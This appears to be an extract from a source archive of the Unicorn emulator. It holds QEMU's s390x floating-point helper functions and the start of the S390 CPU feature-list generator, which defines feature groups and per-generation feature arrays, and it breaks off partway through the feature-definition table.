/* test data class 64-bit */ uint32_t HELPER(tcdb)(CPUS390XState *env, uint64_t v1, uint64_t m2) { return (m2 & float64_dcmask(env, v1)) != 0; } /* test data class 128-bit */ uint32_t HELPER(tcxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t m2) { return (m2 & float128_dcmask(env, make_float128(ah, al))) != 0; } /* square root 32-bit */ uint64_t HELPER(sqeb)(CPUS390XState *env, uint64_t f2) { float32 ret = float32_sqrt(f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* square root 64-bit */ uint64_t HELPER(sqdb)(CPUS390XState *env, uint64_t f2) { float64 ret = float64_sqrt(f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* square root 128-bit */ uint64_t HELPER(sqxb)(CPUS390XState *env, uint64_t ah, uint64_t al) { float128 ret = float128_sqrt(make_float128(ah, al), &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } static const int fpc_to_rnd[8] = { float_round_nearest_even, float_round_to_zero, float_round_up, float_round_down, -1, -1, -1, float_round_to_odd, }; /* set fpc */ void HELPER(sfpc)(CPUS390XState *env, uint64_t fpc) { if (fpc_to_rnd[fpc & 0x7] == -1 || fpc & 0x03030088u || (!s390_has_feat(env->uc, S390_FEAT_FLOATING_POINT_EXT) && fpc & 0x4)) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } /* Install everything in the main FPC. */ env->fpc = fpc; /* Install the rounding mode in the shadow fpu_status. */ set_float_rounding_mode(fpc_to_rnd[fpc & 0x7], &env->fpu_status); } /* set fpc and signal */ void HELPER(sfas)(CPUS390XState *env, uint64_t fpc) { uint32_t signalling = env->fpc; uint32_t s390_exc; if (fpc_to_rnd[fpc & 0x7] == -1 || fpc & 0x03030088u || (!s390_has_feat(env->uc, S390_FEAT_FLOATING_POINT_EXT) && fpc & 0x4)) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } /* * FPC is set to the FPC operand with a bitwise OR of the signalling * flags. */ env->fpc = fpc | (signalling & 0x00ff0000); set_float_rounding_mode(fpc_to_rnd[fpc & 0x7], &env->fpu_status); /* * If any signaling flag is enabled in the new FPC mask, a * simulated-iee-exception exception occurs. */ s390_exc = (signalling >> 16) & (fpc >> 24); if (s390_exc) { if (s390_exc & S390_IEEE_MASK_INVALID) { s390_exc = S390_IEEE_MASK_INVALID; } else if (s390_exc & S390_IEEE_MASK_DIVBYZERO) { s390_exc = S390_IEEE_MASK_DIVBYZERO; } else if (s390_exc & S390_IEEE_MASK_OVERFLOW) { s390_exc &= (S390_IEEE_MASK_OVERFLOW | S390_IEEE_MASK_INEXACT); } else if (s390_exc & S390_IEEE_MASK_UNDERFLOW) { s390_exc &= (S390_IEEE_MASK_UNDERFLOW | S390_IEEE_MASK_INEXACT); } else if (s390_exc & S390_IEEE_MASK_INEXACT) { s390_exc = S390_IEEE_MASK_INEXACT; } else if (s390_exc & S390_IEEE_MASK_QUANTUM) { s390_exc = S390_IEEE_MASK_QUANTUM; } tcg_s390_data_exception(env, s390_exc | 3, GETPC()); } } /* set bfp rounding mode */ void HELPER(srnm)(CPUS390XState *env, uint64_t rnd) { if (rnd > 0x7 || fpc_to_rnd[rnd & 0x7] == -1) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } env->fpc = deposit32(env->fpc, 0, 3, rnd); set_float_rounding_mode(fpc_to_rnd[rnd & 0x7], &env->fpu_status); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/gen-features.c������������������������������������������������������0000664�0000000�0000000�00000065377�14675241067�0021102�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S390 feature list generator * * Copyright IBM Corp. 2016, 2018 * * Author(s): Michael Mueller <mimu@linux.vnet.ibm.com> * David Hildenbrand <dahi@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #include <inttypes.h> #include <stdio.h> #include <string.h> #include "cpu_features_def.h" #define ARRAY_SIZE(array) (sizeof(array) / sizeof(array[0])) /***** BEGIN FEATURE DEFS *****/ #define S390_FEAT_GROUP_PLO \ S390_FEAT_PLO_CL, \ S390_FEAT_PLO_CLG, \ S390_FEAT_PLO_CLGR, \ S390_FEAT_PLO_CLX, \ S390_FEAT_PLO_CS, \ S390_FEAT_PLO_CSG, \ S390_FEAT_PLO_CSGR, \ S390_FEAT_PLO_CSX, \ S390_FEAT_PLO_DCS, \ S390_FEAT_PLO_DCSG, \ S390_FEAT_PLO_DCSGR, \ S390_FEAT_PLO_DCSX, \ S390_FEAT_PLO_CSST, \ S390_FEAT_PLO_CSSTG, \ S390_FEAT_PLO_CSSTGR, \ S390_FEAT_PLO_CSSTX, \ S390_FEAT_PLO_CSDST, \ S390_FEAT_PLO_CSDSTG, \ S390_FEAT_PLO_CSDSTGR, \ S390_FEAT_PLO_CSDSTX, \ S390_FEAT_PLO_CSTST, \ S390_FEAT_PLO_CSTSTG, \ S390_FEAT_PLO_CSTSTGR, \ S390_FEAT_PLO_CSTSTX #define S390_FEAT_GROUP_TOD_CLOCK_STEERING \ S390_FEAT_TOD_CLOCK_STEERING, \ S390_FEAT_PTFF_QTO, \ S390_FEAT_PTFF_QSI, \ S390_FEAT_PTFF_QPT, \ S390_FEAT_PTFF_STO #define S390_FEAT_GROUP_GEN13_PTFF \ S390_FEAT_PTFF_QUI, \ S390_FEAT_PTFF_QTOU, \ S390_FEAT_PTFF_STOU #define S390_FEAT_GROUP_MULTIPLE_EPOCH_PTFF \ S390_FEAT_PTFF_QSIE, \ S390_FEAT_PTFF_QTOUE, \ S390_FEAT_PTFF_STOE, \ S390_FEAT_PTFF_STOUE #define S390_FEAT_GROUP_MSA \ S390_FEAT_MSA, \ S390_FEAT_KMAC_DEA, \ S390_FEAT_KMAC_TDEA_128, \ S390_FEAT_KMAC_TDEA_192, \ S390_FEAT_KMC_DEA, \ S390_FEAT_KMC_TDEA_128, \ S390_FEAT_KMC_TDEA_192, \ S390_FEAT_KM_DEA, \ S390_FEAT_KM_TDEA_128, \ S390_FEAT_KM_TDEA_192, \ S390_FEAT_KIMD_SHA_1, \ S390_FEAT_KLMD_SHA_1 #define S390_FEAT_GROUP_MSA_EXT_1 \ S390_FEAT_KMC_AES_128, \ S390_FEAT_KM_AES_128, \ S390_FEAT_KIMD_SHA_256, \ S390_FEAT_KLMD_SHA_256 #define S390_FEAT_GROUP_MSA_EXT_2 \ S390_FEAT_KMC_AES_192, \ S390_FEAT_KMC_AES_256, \ S390_FEAT_KMC_PRNG, \ S390_FEAT_KM_AES_192, \ S390_FEAT_KM_AES_256, \ S390_FEAT_KIMD_SHA_512, \ S390_FEAT_KLMD_SHA_512 #define S390_FEAT_GROUP_MSA_EXT_3 \ S390_FEAT_MSA_EXT_3, \ S390_FEAT_KMAC_EDEA, \ S390_FEAT_KMAC_ETDEA_128, \ S390_FEAT_KMAC_ETDEA_192, \ S390_FEAT_KMC_EAES_128, \ S390_FEAT_KMC_EAES_192, \ S390_FEAT_KMC_EAES_256, \ S390_FEAT_KMC_EDEA, \ S390_FEAT_KMC_ETDEA_128, \ S390_FEAT_KMC_ETDEA_192, \ S390_FEAT_KM_EDEA, \ S390_FEAT_KM_ETDEA_128, \ S390_FEAT_KM_ETDEA_192, \ S390_FEAT_KM_EAES_128, \ S390_FEAT_KM_EAES_192, \ S390_FEAT_KM_EAES_256, \ S390_FEAT_PCKMO_EDEA, \ S390_FEAT_PCKMO_ETDEA_128, \ S390_FEAT_PCKMO_ETDEA_256, \ S390_FEAT_PCKMO_AES_128, \ S390_FEAT_PCKMO_AES_192, \ S390_FEAT_PCKMO_AES_256 #define S390_FEAT_GROUP_MSA_EXT_4 \ S390_FEAT_MSA_EXT_4, \ S390_FEAT_KMAC_AES_128, \ S390_FEAT_KMAC_AES_192, \ S390_FEAT_KMAC_AES_256, \ S390_FEAT_KMAC_EAES_128, \ S390_FEAT_KMAC_EAES_192, \ S390_FEAT_KMAC_EAES_256, \ S390_FEAT_KM_XTS_AES_128, \ S390_FEAT_KM_XTS_AES_256, \ S390_FEAT_KM_XTS_EAES_128, \ S390_FEAT_KM_XTS_EAES_256, \ S390_FEAT_KIMD_GHASH, \ S390_FEAT_KMCTR_DEA, \ S390_FEAT_KMCTR_TDEA_128, \ S390_FEAT_KMCTR_TDEA_192, \ S390_FEAT_KMCTR_EDEA, \ S390_FEAT_KMCTR_ETDEA_128, \ S390_FEAT_KMCTR_ETDEA_192, \ S390_FEAT_KMCTR_AES_128, \ S390_FEAT_KMCTR_AES_192, \ S390_FEAT_KMCTR_AES_256, \ S390_FEAT_KMCTR_EAES_128, \ S390_FEAT_KMCTR_EAES_192, \ S390_FEAT_KMCTR_EAES_256, \ S390_FEAT_KMF_DEA, \ S390_FEAT_KMF_TDEA_128, \ S390_FEAT_KMF_TDEA_192, \ S390_FEAT_KMF_EDEA, \ S390_FEAT_KMF_ETDEA_128, \ S390_FEAT_KMF_ETDEA_192, \ S390_FEAT_KMF_AES_128, \ S390_FEAT_KMF_AES_192, \ S390_FEAT_KMF_AES_256, \ S390_FEAT_KMF_EAES_128, \ S390_FEAT_KMF_EAES_192, \ S390_FEAT_KMF_EAES_256, \ S390_FEAT_KMO_DEA, \ S390_FEAT_KMO_TDEA_128, \ S390_FEAT_KMO_TDEA_192, \ S390_FEAT_KMO_EDEA, \ S390_FEAT_KMO_ETDEA_128, \ S390_FEAT_KMO_ETDEA_192, \ S390_FEAT_KMO_AES_128, \ S390_FEAT_KMO_AES_192, \ S390_FEAT_KMO_AES_256, \ S390_FEAT_KMO_EAES_128, \ S390_FEAT_KMO_EAES_192, \ S390_FEAT_KMO_EAES_256, \ S390_FEAT_PCC_CMAC_DEA, \ S390_FEAT_PCC_CMAC_TDEA_128, \ S390_FEAT_PCC_CMAC_TDEA_192, \ S390_FEAT_PCC_CMAC_ETDEA_128, \ S390_FEAT_PCC_CMAC_ETDEA_192, \ S390_FEAT_PCC_CMAC_TDEA, \ S390_FEAT_PCC_CMAC_AES_128, \ S390_FEAT_PCC_CMAC_AES_192, \ S390_FEAT_PCC_CMAC_AES_256, \ S390_FEAT_PCC_CMAC_EAES_128, \ S390_FEAT_PCC_CMAC_EAES_192, \ S390_FEAT_PCC_CMAC_EAES_256, \ S390_FEAT_PCC_XTS_AES_128, \ S390_FEAT_PCC_XTS_AES_256, \ S390_FEAT_PCC_XTS_EAES_128, \ S390_FEAT_PCC_XTS_EAES_256 #define S390_FEAT_GROUP_MSA_EXT_5 \ S390_FEAT_MSA_EXT_5, \ S390_FEAT_PPNO_SHA_512_DRNG #define S390_FEAT_GROUP_MSA_EXT_6 \ S390_FEAT_KIMD_SHA3_224, \ S390_FEAT_KIMD_SHA3_256, \ S390_FEAT_KIMD_SHA3_384, \ S390_FEAT_KIMD_SHA3_512, \ S390_FEAT_KIMD_SHAKE_128, \ S390_FEAT_KIMD_SHAKE_256, \ S390_FEAT_KLMD_SHA3_224, \ S390_FEAT_KLMD_SHA3_256, \ S390_FEAT_KLMD_SHA3_384, \ S390_FEAT_KLMD_SHA3_512, \ S390_FEAT_KLMD_SHAKE_128, \ S390_FEAT_KLMD_SHAKE_256 #define S390_FEAT_GROUP_MSA_EXT_7 \ S390_FEAT_PRNO_TRNG_QRTCR, \ S390_FEAT_PRNO_TRNG #define S390_FEAT_GROUP_MSA_EXT_8 \ S390_FEAT_MSA_EXT_8, \ S390_FEAT_KMA_GCM_AES_128, \ S390_FEAT_KMA_GCM_AES_192, \ S390_FEAT_KMA_GCM_AES_256 , \ S390_FEAT_KMA_GCM_EAES_128, \ S390_FEAT_KMA_GCM_EAES_192, \ S390_FEAT_KMA_GCM_EAES_256 #define S390_FEAT_GROUP_MSA_EXT_9 \ S390_FEAT_MSA_EXT_9, \ S390_FEAT_KDSA_ECDSA_VERIFY_P256, \ S390_FEAT_KDSA_ECDSA_VERIFY_P384, \ S390_FEAT_KDSA_ECDSA_VERIFY_P512, \ S390_FEAT_KDSA_ECDSA_SIGN_P256, \ S390_FEAT_KDSA_ECDSA_SIGN_P384, \ S390_FEAT_KDSA_ECDSA_SIGN_P512, \ S390_FEAT_KDSA_EECDSA_SIGN_P256, \ S390_FEAT_KDSA_EECDSA_SIGN_P384, \ S390_FEAT_KDSA_EECDSA_SIGN_P512, \ S390_FEAT_KDSA_EDDSA_VERIFY_ED25519, \ S390_FEAT_KDSA_EDDSA_VERIFY_ED448, \ S390_FEAT_KDSA_EDDSA_SIGN_ED25519, \ S390_FEAT_KDSA_EDDSA_SIGN_ED448, \ S390_FEAT_KDSA_EEDDSA_SIGN_ED25519, \ S390_FEAT_KDSA_EEDDSA_SIGN_ED448, \ S390_FEAT_PCC_SCALAR_MULT_P256, \ S390_FEAT_PCC_SCALAR_MULT_P384, \ S390_FEAT_PCC_SCALAR_MULT_P512, \ S390_FEAT_PCC_SCALAR_MULT_ED25519, \ S390_FEAT_PCC_SCALAR_MULT_ED448, \ S390_FEAT_PCC_SCALAR_MULT_X25519, \ S390_FEAT_PCC_SCALAR_MULT_X448 #define S390_FEAT_GROUP_MSA_EXT_9_PCKMO \ S390_FEAT_PCKMO_ECC_P256, \ S390_FEAT_PCKMO_ECC_P384, \ S390_FEAT_PCKMO_ECC_P521, \ S390_FEAT_PCKMO_ECC_ED25519, \ S390_FEAT_PCKMO_ECC_ED448 #define S390_FEAT_GROUP_ENH_SORT \ S390_FEAT_ESORT_BASE, \ S390_FEAT_SORTL_SFLR, \ S390_FEAT_SORTL_SVLR, \ S390_FEAT_SORTL_32, \ S390_FEAT_SORTL_128, \ S390_FEAT_SORTL_F0 #define S390_FEAT_GROUP_DEFLATE_CONVERSION \ S390_FEAT_DEFLATE_BASE, \ S390_FEAT_DEFLATE_GHDT, \ S390_FEAT_DEFLATE_CMPR, \ S390_FEAT_DEFLATE_XPND, \ S390_FEAT_DEFLATE_F0 /* cpu feature groups */ static uint16_t group_PLO[] = { S390_FEAT_GROUP_PLO, }; static uint16_t group_TOD_CLOCK_STEERING[] = { S390_FEAT_GROUP_TOD_CLOCK_STEERING, }; static uint16_t group_GEN13_PTFF[] = { S390_FEAT_GROUP_GEN13_PTFF, }; static uint16_t group_MULTIPLE_EPOCH_PTFF[] = { S390_FEAT_GROUP_MULTIPLE_EPOCH_PTFF, }; static uint16_t group_MSA[] = { S390_FEAT_GROUP_MSA, }; static uint16_t group_MSA_EXT_1[] = { S390_FEAT_GROUP_MSA_EXT_1, }; static uint16_t group_MSA_EXT_2[] = { S390_FEAT_GROUP_MSA_EXT_2, }; static uint16_t group_MSA_EXT_3[] = { S390_FEAT_GROUP_MSA_EXT_3, }; static uint16_t group_MSA_EXT_4[] = { S390_FEAT_GROUP_MSA_EXT_4, }; static uint16_t group_MSA_EXT_5[] = { S390_FEAT_GROUP_MSA_EXT_5, }; static uint16_t group_MSA_EXT_6[] = { S390_FEAT_GROUP_MSA_EXT_6, }; static uint16_t group_MSA_EXT_7[] = { S390_FEAT_GROUP_MSA_EXT_7, }; static uint16_t group_MSA_EXT_8[] = { S390_FEAT_GROUP_MSA_EXT_8, }; static uint16_t group_MSA_EXT_9[] = { S390_FEAT_GROUP_MSA_EXT_9, }; static uint16_t group_MSA_EXT_9_PCKMO[] = { S390_FEAT_GROUP_MSA_EXT_9_PCKMO, }; static uint16_t group_ENH_SORT[] = { S390_FEAT_GROUP_ENH_SORT, }; static uint16_t group_DEFLATE_CONVERSION[] = { S390_FEAT_GROUP_DEFLATE_CONVERSION, }; /* Base features (in order of release) * Only non-hypervisor managed features belong here. * Base feature sets are static meaning they do not change in future QEMU * releases. */ static uint16_t base_GEN7_GA1[] = { S390_FEAT_GROUP_PLO, S390_FEAT_ESAN3, S390_FEAT_ZARCH, }; #define base_GEN7_GA2 EmptyFeat #define base_GEN7_GA3 EmptyFeat static uint16_t base_GEN8_GA1[] = { S390_FEAT_DAT_ENH, S390_FEAT_EXTENDED_TRANSLATION_2, S390_FEAT_GROUP_MSA, S390_FEAT_LONG_DISPLACEMENT, S390_FEAT_LONG_DISPLACEMENT_FAST, S390_FEAT_HFP_MADDSUB, }; #define base_GEN8_GA2 EmptyFeat #define base_GEN8_GA3 EmptyFeat #define base_GEN8_GA4 EmptyFeat #define base_GEN8_GA5 EmptyFeat static uint16_t base_GEN9_GA1[] = { S390_FEAT_IDTE_SEGMENT, S390_FEAT_ASN_LX_REUSE, S390_FEAT_STFLE, S390_FEAT_SENSE_RUNNING_STATUS, S390_FEAT_EXTENDED_IMMEDIATE, S390_FEAT_EXTENDED_TRANSLATION_3, S390_FEAT_HFP_UNNORMALIZED_EXT, S390_FEAT_ETF2_ENH, S390_FEAT_STORE_CLOCK_FAST, S390_FEAT_GROUP_TOD_CLOCK_STEERING, S390_FEAT_ETF3_ENH, S390_FEAT_DAT_ENH_2, }; #define base_GEN9_GA2 EmptyFeat #define base_GEN9_GA3 EmptyFeat static uint16_t base_GEN10_GA1[] = { S390_FEAT_CONDITIONAL_SSKE, S390_FEAT_PARSING_ENH, S390_FEAT_MOVE_WITH_OPTIONAL_SPEC, S390_FEAT_EXTRACT_CPU_TIME, S390_FEAT_COMPARE_AND_SWAP_AND_STORE, S390_FEAT_COMPARE_AND_SWAP_AND_STORE_2, S390_FEAT_GENERAL_INSTRUCTIONS_EXT, S390_FEAT_EXECUTE_EXT, S390_FEAT_FLOATING_POINT_SUPPPORT_ENH, S390_FEAT_DFP, S390_FEAT_DFP_FAST, S390_FEAT_PFPO, }; #define base_GEN10_GA2 EmptyFeat #define base_GEN10_GA3 EmptyFeat static uint16_t base_GEN11_GA1[] = { S390_FEAT_NONQ_KEY_SETTING, S390_FEAT_ENHANCED_MONITOR, S390_FEAT_FLOATING_POINT_EXT, S390_FEAT_SET_PROGRAM_PARAMETERS, S390_FEAT_STFLE_45, S390_FEAT_CMPSC_ENH, S390_FEAT_INTERLOCKED_ACCESS_2, }; #define base_GEN11_GA2 EmptyFeat static uint16_t base_GEN12_GA1[] = { S390_FEAT_DFP_ZONED_CONVERSION, S390_FEAT_STFLE_49, S390_FEAT_LOCAL_TLB_CLEARING, }; #define base_GEN12_GA2 EmptyFeat static uint16_t base_GEN13_GA1[] = { S390_FEAT_STFLE_53, S390_FEAT_DFP_PACKED_CONVERSION, S390_FEAT_GROUP_GEN13_PTFF, }; #define base_GEN13_GA2 EmptyFeat static uint16_t base_GEN14_GA1[] = { S390_FEAT_ENTROPY_ENC_COMP, S390_FEAT_MISC_INSTRUCTION_EXT, S390_FEAT_SEMAPHORE_ASSIST, S390_FEAT_TIME_SLICE_INSTRUMENTATION, S390_FEAT_ORDER_PRESERVING_COMPRESSION, }; #define base_GEN14_GA2 EmptyFeat static uint16_t base_GEN15_GA1[] = { S390_FEAT_MISC_INSTRUCTION_EXT3, }; /* Full features (in order of release) * Automatically includes corresponding base features. * Full features are all features this hardware supports even if kvm/QEMU do not * support these features yet. */ static uint16_t full_GEN7_GA1[] = { S390_FEAT_PPA15, S390_FEAT_BPB, S390_FEAT_SIE_F2, S390_FEAT_SIE_SKEY, S390_FEAT_SIE_GPERE, S390_FEAT_SIE_IB, S390_FEAT_SIE_CEI, }; static uint16_t full_GEN7_GA2[] = { S390_FEAT_EXTENDED_TRANSLATION_2, }; static uint16_t full_GEN7_GA3[] = { S390_FEAT_LONG_DISPLACEMENT, S390_FEAT_SIE_SIIF, }; static uint16_t full_GEN8_GA1[] = { S390_FEAT_SIE_GSLS, S390_FEAT_SIE_64BSCAO, }; #define full_GEN8_GA2 EmptyFeat static uint16_t full_GEN8_GA3[] = { S390_FEAT_ASN_LX_REUSE, S390_FEAT_EXTENDED_TRANSLATION_3, }; #define full_GEN8_GA4 EmptyFeat #define full_GEN8_GA5 EmptyFeat static uint16_t full_GEN9_GA1[] = { S390_FEAT_STORE_HYPERVISOR_INFO, S390_FEAT_GROUP_MSA_EXT_1, S390_FEAT_CMM, S390_FEAT_SIE_CMMA, }; static uint16_t full_GEN9_GA2[] = { S390_FEAT_MOVE_WITH_OPTIONAL_SPEC, S390_FEAT_EXTRACT_CPU_TIME, S390_FEAT_COMPARE_AND_SWAP_AND_STORE, S390_FEAT_FLOATING_POINT_SUPPPORT_ENH, S390_FEAT_DFP, }; static uint16_t full_GEN9_GA3[] = { S390_FEAT_CONDITIONAL_SSKE, S390_FEAT_PFPO, }; static uint16_t full_GEN10_GA1[] = { S390_FEAT_EDAT, S390_FEAT_CONFIGURATION_TOPOLOGY, S390_FEAT_GROUP_MSA_EXT_2, S390_FEAT_ESOP, S390_FEAT_SIE_PFMFI, S390_FEAT_SIE_SIGPIF, }; static uint16_t full_GEN10_GA2[] = { S390_FEAT_SET_PROGRAM_PARAMETERS, S390_FEAT_SIE_IBS, }; static uint16_t full_GEN10_GA3[] = { S390_FEAT_GROUP_MSA_EXT_3, }; static uint16_t full_GEN11_GA1[] = { S390_FEAT_IPTE_RANGE, S390_FEAT_ACCESS_EXCEPTION_FS_INDICATION, S390_FEAT_GROUP_MSA_EXT_4, }; #define full_GEN11_GA2 EmptyFeat static uint16_t full_GEN12_GA1[] = { S390_FEAT_CONSTRAINT_TRANSACTIONAL_EXE, S390_FEAT_TRANSACTIONAL_EXE, S390_FEAT_RUNTIME_INSTRUMENTATION, S390_FEAT_ZPCI, S390_FEAT_ADAPTER_EVENT_NOTIFICATION, S390_FEAT_ADAPTER_INT_SUPPRESSION, S390_FEAT_EDAT_2, S390_FEAT_SIDE_EFFECT_ACCESS_ESOP2, S390_FEAT_AP_QUERY_CONFIG_INFO, S390_FEAT_AP_QUEUE_INTERRUPT_CONTROL, S390_FEAT_AP_FACILITIES_TEST, S390_FEAT_AP, }; static uint16_t full_GEN12_GA2[] = { S390_FEAT_GROUP_MSA_EXT_5, }; static uint16_t full_GEN13_GA1[] = { S390_FEAT_VECTOR, }; #define full_GEN13_GA2 EmptyFeat static uint16_t full_GEN14_GA1[] = { S390_FEAT_INSTRUCTION_EXEC_PROT, S390_FEAT_GUARDED_STORAGE, S390_FEAT_VECTOR_PACKED_DECIMAL, S390_FEAT_VECTOR_ENH, S390_FEAT_MULTIPLE_EPOCH, S390_FEAT_TEST_PENDING_EXT_INTERRUPTION, S390_FEAT_INSERT_REFERENCE_BITS_MULT, S390_FEAT_GROUP_MSA_EXT_6, S390_FEAT_GROUP_MSA_EXT_7, S390_FEAT_GROUP_MSA_EXT_8, S390_FEAT_CMM_NT, S390_FEAT_ETOKEN, S390_FEAT_HPMA2, S390_FEAT_SIE_KSS, S390_FEAT_GROUP_MULTIPLE_EPOCH_PTFF, }; #define full_GEN14_GA2 EmptyFeat static uint16_t full_GEN15_GA1[] = { S390_FEAT_VECTOR_ENH2, S390_FEAT_GROUP_ENH_SORT, S390_FEAT_GROUP_DEFLATE_CONVERSION, S390_FEAT_VECTOR_PACKED_DECIMAL_ENH, S390_FEAT_GROUP_MSA_EXT_9, S390_FEAT_GROUP_MSA_EXT_9_PCKMO, S390_FEAT_ETOKEN, }; /* Default features (in order of release) * Automatically includes corresponding base features. * Default features are all features this version of QEMU supports for this * hardware model. Default feature sets can grow with new QEMU releases. */ #define default_GEN7_GA1 EmptyFeat #define default_GEN7_GA2 EmptyFeat #define default_GEN7_GA3 EmptyFeat #define default_GEN8_GA1 EmptyFeat #define default_GEN8_GA2 EmptyFeat #define default_GEN8_GA3 EmptyFeat #define default_GEN8_GA4 EmptyFeat #define default_GEN8_GA5 EmptyFeat static uint16_t default_GEN9_GA1[] = { S390_FEAT_STORE_HYPERVISOR_INFO, S390_FEAT_GROUP_MSA_EXT_1, S390_FEAT_CMM, }; #define default_GEN9_GA2 EmptyFeat #define default_GEN9_GA3 EmptyFeat static uint16_t default_GEN10_GA1[] = { S390_FEAT_EDAT, S390_FEAT_GROUP_MSA_EXT_2, }; #define default_GEN10_GA2 EmptyFeat #define default_GEN10_GA3 EmptyFeat static uint16_t default_GEN11_GA1[] = { S390_FEAT_GROUP_MSA_EXT_3, S390_FEAT_IPTE_RANGE, S390_FEAT_ACCESS_EXCEPTION_FS_INDICATION, S390_FEAT_GROUP_MSA_EXT_4, S390_FEAT_PPA15, S390_FEAT_BPB, }; #define default_GEN11_GA2 EmptyFeat static uint16_t default_GEN12_GA1[] = { S390_FEAT_CONSTRAINT_TRANSACTIONAL_EXE, S390_FEAT_TRANSACTIONAL_EXE, S390_FEAT_RUNTIME_INSTRUMENTATION, S390_FEAT_ZPCI, S390_FEAT_ADAPTER_EVENT_NOTIFICATION, S390_FEAT_EDAT_2, S390_FEAT_ESOP, S390_FEAT_SIDE_EFFECT_ACCESS_ESOP2, }; #define default_GEN12_GA2 EmptyFeat static uint16_t default_GEN13_GA1[] = { S390_FEAT_GROUP_MSA_EXT_5, S390_FEAT_VECTOR, }; #define default_GEN13_GA2 EmptyFeat static uint16_t default_GEN14_GA1[] = { S390_FEAT_INSTRUCTION_EXEC_PROT, S390_FEAT_GUARDED_STORAGE, S390_FEAT_VECTOR_PACKED_DECIMAL, S390_FEAT_VECTOR_ENH, S390_FEAT_GROUP_MSA_EXT_6, S390_FEAT_GROUP_MSA_EXT_7, S390_FEAT_GROUP_MSA_EXT_8, S390_FEAT_MULTIPLE_EPOCH, S390_FEAT_GROUP_MULTIPLE_EPOCH_PTFF, }; #define default_GEN14_GA2 EmptyFeat static uint16_t default_GEN15_GA1[] = { S390_FEAT_VECTOR_ENH2, S390_FEAT_GROUP_DEFLATE_CONVERSION, S390_FEAT_VECTOR_PACKED_DECIMAL_ENH, S390_FEAT_GROUP_MSA_EXT_9, S390_FEAT_GROUP_MSA_EXT_9_PCKMO, S390_FEAT_ETOKEN, }; /* QEMU (CPU model) features */ static uint16_t qemu_V2_11[] = { S390_FEAT_GROUP_PLO, S390_FEAT_ESAN3, S390_FEAT_ZARCH, }; static uint16_t qemu_V3_1[] = { S390_FEAT_DAT_ENH, S390_FEAT_IDTE_SEGMENT, S390_FEAT_STFLE, S390_FEAT_SENSE_RUNNING_STATUS, S390_FEAT_EXTENDED_TRANSLATION_2, S390_FEAT_MSA, S390_FEAT_LONG_DISPLACEMENT, S390_FEAT_LONG_DISPLACEMENT_FAST, S390_FEAT_EXTENDED_IMMEDIATE, S390_FEAT_EXTENDED_TRANSLATION_3, S390_FEAT_ETF2_ENH, S390_FEAT_STORE_CLOCK_FAST, S390_FEAT_MOVE_WITH_OPTIONAL_SPEC, S390_FEAT_ETF3_ENH, S390_FEAT_EXTRACT_CPU_TIME, S390_FEAT_COMPARE_AND_SWAP_AND_STORE, S390_FEAT_COMPARE_AND_SWAP_AND_STORE_2, S390_FEAT_GENERAL_INSTRUCTIONS_EXT, S390_FEAT_EXECUTE_EXT, S390_FEAT_SET_PROGRAM_PARAMETERS, S390_FEAT_FLOATING_POINT_SUPPPORT_ENH, S390_FEAT_STFLE_45, S390_FEAT_STFLE_49, S390_FEAT_LOCAL_TLB_CLEARING, S390_FEAT_INTERLOCKED_ACCESS_2, S390_FEAT_ADAPTER_EVENT_NOTIFICATION, S390_FEAT_ADAPTER_INT_SUPPRESSION, S390_FEAT_MSA_EXT_3, S390_FEAT_MSA_EXT_4, }; static uint16_t qemu_V4_0[] = { /* * Only BFP bits are implemented (HFP, DFP, PFPO and DIVIDE TO INTEGER not * implemented yet). */ S390_FEAT_FLOATING_POINT_EXT, S390_FEAT_ZPCI, }; static uint16_t qemu_V4_1[] = { S390_FEAT_STFLE_53, S390_FEAT_VECTOR, }; static uint16_t qemu_LATEST[] = { S390_FEAT_ACCESS_EXCEPTION_FS_INDICATION, S390_FEAT_SIDE_EFFECT_ACCESS_ESOP2, S390_FEAT_ESOP, }; /* add all new definitions before this point */ static uint16_t qemu_MAX[] = { /* generates a dependency warning, leave it out for now */ S390_FEAT_MSA_EXT_5, /* features introduced after the z13 */ S390_FEAT_INSTRUCTION_EXEC_PROT, }; /****** END FEATURE DEFS ******/ #define _YEARS "2016" #define _NAME_H "TARGET_S390X_GEN_FEATURES_H" #define CPU_FEAT_INITIALIZER(_name) \ { \ .name = "S390_FEAT_LIST_" #_name, \ .base_bits = \ { .data = base_##_name, \ .len = ARRAY_SIZE(base_##_name) }, \ .default_bits = \ { .data = default_##_name, \ .len = ARRAY_SIZE(default_##_name) }, \ .full_bits = \ { .data = full_##_name, \ .len = ARRAY_SIZE(full_##_name) }, \ } typedef struct BitSpec { uint16_t *data; uint32_t len; } BitSpec; typedef struct { const char *name; BitSpec base_bits; BitSpec default_bits; BitSpec full_bits; } CpuFeatDefSpec; static uint16_t EmptyFeat[] = {}; /******************************* * processor GA series *******************************/ static CpuFeatDefSpec CpuFeatDef[] = { CPU_FEAT_INITIALIZER(GEN7_GA1), CPU_FEAT_INITIALIZER(GEN7_GA2), CPU_FEAT_INITIALIZER(GEN7_GA3), CPU_FEAT_INITIALIZER(GEN8_GA1), CPU_FEAT_INITIALIZER(GEN8_GA2), CPU_FEAT_INITIALIZER(GEN8_GA3), CPU_FEAT_INITIALIZER(GEN8_GA4), CPU_FEAT_INITIALIZER(GEN8_GA5), CPU_FEAT_INITIALIZER(GEN9_GA1), CPU_FEAT_INITIALIZER(GEN9_GA2), CPU_FEAT_INITIALIZER(GEN9_GA3), CPU_FEAT_INITIALIZER(GEN10_GA1), CPU_FEAT_INITIALIZER(GEN10_GA2), CPU_FEAT_INITIALIZER(GEN10_GA3), CPU_FEAT_INITIALIZER(GEN11_GA1), CPU_FEAT_INITIALIZER(GEN11_GA2), CPU_FEAT_INITIALIZER(GEN12_GA1), 